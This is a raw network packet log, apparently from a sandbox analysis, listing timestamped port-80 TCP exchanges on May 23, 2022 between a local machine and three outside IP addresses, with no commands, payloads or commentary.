                                  May 23, 2022 09:50:06.527535915 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.527546883 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.527561903 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.527580023 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.527595043 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.527611971 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.527627945 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.527765036 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.527812958 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.531280994 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.556988955 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.557030916 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.557084084 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.557087898 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.557111979 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.557126045 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.557140112 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.557142973 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.557168007 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.557188034 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.557195902 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.557205915 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.557224989 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.557243109 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.557252884 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.557255030 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.557280064 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.557301998 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.557313919 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.557317972 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.557354927 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.557360888 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.557383060 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.557410955 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.557430029 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.557439089 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.557441950 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.557444096 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.557482004 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.557483912 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.557508945 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.557521105 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.557539940 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.557545900 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.557579041 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.558299065 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.560410023 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.560630083 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.560873032 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.586729050 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.586775064 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.586812973 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.586853027 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.586858034 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.586890936 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.586894035 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.586896896 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.586936951 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.586956978 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.586977005 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.586992979 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.587016106 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.587034941 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.587054014 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.587074995 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.587094069 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.587110996 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.587132931 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.587153912 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.587174892 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.587189913 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.587214947 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.587227106 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.587255001 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.587268114 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.587296009 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.587315083 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.587335110 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.587356091 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.587373018 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.587384939 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.587413073 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.587423086 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.587452888 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:06.587466002 CEST4917280192.168.2.2285.114.142.153
                                  May 23, 2022 09:50:06.587492943 CEST804917285.114.142.153192.168.2.22
                                  May 23, 2022 09:50:10.974692106 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:10.974704027 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.974740028 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.974761009 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:10.974800110 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:10.974852085 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.974888086 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.974910021 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:10.974953890 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.974961996 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.974987984 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:10.975028038 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:10.975047112 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.975084066 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.975105047 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:10.975145102 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:10.975162983 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.975202084 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.975218058 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:10.975258112 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:10.975275993 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.975308895 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.975333929 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:10.975375891 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.975388050 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.975413084 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:10.975452900 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:10.975470066 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.975508928 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.975528002 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:10.975567102 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:10.975584984 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.975617886 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.975642920 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:10.975662947 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.975696087 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.975717068 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:10.975754976 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:10.975771904 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.975807905 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.975828886 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:10.975868940 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:10.975887060 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.975927114 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.975943089 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:10.975981951 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:10.976000071 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.976022005 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.976031065 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.976072073 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:10.976110935 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:10.976128101 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.976164103 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.976186037 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:10.976247072 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.976893902 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:10.976958990 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.977462053 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:10.977524042 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.977678061 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:10.977732897 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.977823973 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:10.977876902 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.978609085 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:10.978672981 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.979074955 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:10.979113102 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:10.979135990 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.979165077 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.979177952 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:10.979228020 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:10.980787992 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.101042986 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.101102114 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.101152897 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.101171017 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.101191998 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.101234913 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.101257086 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.101298094 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.101320982 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.101360083 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.101380110 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.101422071 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.101439953 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.101475954 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.101499081 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.101540089 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.101558924 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.101599932 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.101617098 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.101655960 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.101674080 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.101710081 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.101732016 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.101773977 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.101792097 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.101831913 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.101850033 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.101891041 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.101939917 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.101955891 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.102009058 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.102024078 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.102062941 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.102102995 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.102114916 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.102119923 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.102163076 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.102202892 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.102222919 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.102261066 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.102282047 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.102327108 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.102348089 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.102395058 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.102407932 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.102444887 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.102468014 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.102509022 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.102528095 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.102560997 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.102586031 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.102626085 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.102643967 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.102680922 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.102699995 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.102741957 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.102763891 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.102809906 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.102861881 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.102899075 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.102920055 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.102966070 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.102977037 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.103013039 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.103034019 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.103080988 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.103094101 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.103130102 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.103152990 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.103202105 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.103213072 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.103260040 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.103271008 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.103306055 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.103327990 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.103374004 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.103401899 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.103449106 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.103471041 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.103532076 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.103543997 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.103580952 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.103601933 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.103642941 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.103661060 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.103698015 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.103718042 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.103759050 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.103776932 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.103816032 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.103832006 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.103883028 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.105082035 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.105354071 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.105400085 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.105420113 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.105488062 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.107517004 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.228524923 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.228655100 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.228991985 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.229012012 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.229029894 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.229039907 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.229049921 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.229063034 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.229072094 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.229090929 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.229104996 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.229115963 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.229125977 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.229141951 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.229151011 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.229172945 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.229528904 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.229547977 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.229564905 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.229574919 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.229588032 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.229604959 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.229612112 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.229629040 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.229639053 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.229655027 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.229662895 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.229693890 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.229742050 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.229773998 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.229779959 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.229805946 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.229819059 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.229846954 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.229856014 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.229882956 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.229929924 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.229948044 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.229969025 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.229975939 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.229979992 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.229998112 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.230005026 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.230036020 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.230128050 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.230146885 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.230174065 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.230179071 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.230190992 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.230207920 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.230221987 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.230237007 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.230242968 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.230259895 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.230269909 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.230284929 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.230293989 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.230309010 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.230318069 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.230334044 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.230344057 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.230360985 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.230369091 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.230396986 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.230458021 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.230499983 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.230516911 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.230535030 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.230550051 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.230561972 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.230573893 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.230596066 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.230603933 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.230648041 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.230665922 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.230679989 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.230690956 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.230700016 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.230717897 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.230725050 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.230727911 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.230750084 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.230840921 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.230856895 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.230878115 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.230885029 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.230892897 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.230909109 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.230918884 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.230941057 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.230962992 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.230973959 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.230989933 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.230995893 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.231023073 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.231985092 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.232006073 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.232023954 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.232038975 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.353179932 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.353199005 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.353216887 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.353233099 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.353254080 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:16.903026104 CEST4917480192.168.2.22107.189.3.39
